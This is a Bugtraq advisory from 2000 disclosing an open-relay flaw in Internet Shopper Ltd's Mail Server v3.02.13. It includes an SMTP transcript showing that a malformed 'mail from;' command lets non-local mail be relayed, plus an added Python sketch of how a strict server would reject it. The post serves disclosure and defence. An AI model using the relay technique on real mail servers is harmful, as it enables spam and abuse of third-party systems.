Bugtraq mailing list archives

Internet Shopper Ltd's Mail Server Open relay bug.


From: Imran Ghory <ImranG () BTINTERNET COM>
Date: Fri, 15 Sep 2000 20:41:35 +0100

Internet Shopper Ltd's Mail Server Open relay bug.

(I have been unable to make contact with Internet Shopper Ltd, and
as this bug might easily be found accidentally I have decided to make
it public)

SUMMARY:

Internet Shopper Ltd's Mail Server can be made to accept and
handle mail for non-local sites.

DETAILS:

Version involved:

Internet Shopper Ltd's Mail Server v3.02.13

No other versions have been tested.

Exploit:

The use of the semi-colon in the "mail from" command will allow
mail to be sent to machines that aren't local.

Exploit in action:

220 mailsvr.xxxxxxxxxx.ac.uk WindowsNT SMTP Server
v3.02.13/32.aap3 ready at Wed, 13 Sep 2000 21:03:39 +0100
helo me
250 mailsvr.xxxxxxxxxx.ac.uk me
mail from;
250 Ok.
rcpt to: ImranG () btinternet com
250 Ok.
data
354 Start mail input, end with <CRLF>.<CRLF>.

Test data
.
250 Requested mail action Ok.
quit
221 Goodbye me

Fix:

None known at this time.

Imran Ghory
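
An added example, not part of the original post and not the vendor's code: a sketch of the replies a strict, non-relaying SMTP server would give to the command sequence shown in the transcript, so the malformed "mail from;" never opens a mail transaction. The function name, the simplified grammar, the 550 relay-denial policy and the example.* addresses are assumptions made for illustration.

```python
import re

# Simplified envelope grammar (after RFC 5321): the verb, a colon, then a path.
# Angle brackets are optional here, a leniency assumed for this sketch.
MAIL_RE = re.compile(r"^MAIL FROM:\s*<?([^<>\s]*)>?$", re.I)
RCPT_RE = re.compile(r"^RCPT TO:\s*<?[^<>\s@]+@([^<>\s@]+)>?$", re.I)

def strict_replies(client_lines, local_domains):
    """Return [(command, reply_code, reason)] a strict, non-relaying server would give."""
    local = {d.lower() for d in local_domains}
    have_sender, recipients, out = False, 0, []
    for raw in client_lines:
        cmd = raw.strip()
        verb = cmd[:4].upper()
        if verb in ("HELO", "EHLO"):
            have_sender, recipients = False, 0
            out.append((cmd, 250, "greeting"))
        elif verb == "MAIL":
            if MAIL_RE.match(cmd):
                have_sender, recipients = True, 0
                out.append((cmd, 250, "sender accepted"))
            else:
                # "mail from;" lands here: no colon, no reverse-path.
                out.append((cmd, 501, "malformed MAIL FROM"))
        elif verb == "RCPT":
            m = RCPT_RE.match(cmd)
            if not have_sender:
                out.append((cmd, 503, "RCPT before valid MAIL"))
            elif not m:
                out.append((cmd, 501, "malformed RCPT TO"))
            elif m.group(1).lower() not in local:
                out.append((cmd, 550, "relay denied: non-local domain"))
            else:
                recipients += 1
                out.append((cmd, 250, "recipient accepted"))
        elif verb == "DATA":
            ok = recipients > 0
            out.append((cmd, 354 if ok else 503, "start input" if ok else "no valid recipients"))
    return out

# Constructed session modelled on the transcript above; addresses are placeholders.
SESSION = ["helo me", "mail from;", "rcpt to: someone@remote.example", "data"]
# Constructed well-formed session to a local recipient, for contrast.
GOOD = ["helo me", "mail from:<a@remote.example>", "rcpt to:<b@local.example>", "data"]

if __name__ == "__main__":
    for row in strict_replies(SESSION, ["local.example"]):
        print(row)
```

Running the same function over a server's session log and comparing its codes with the replies the server actually sent highlights sessions where a malformed envelope command was answered with 250.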

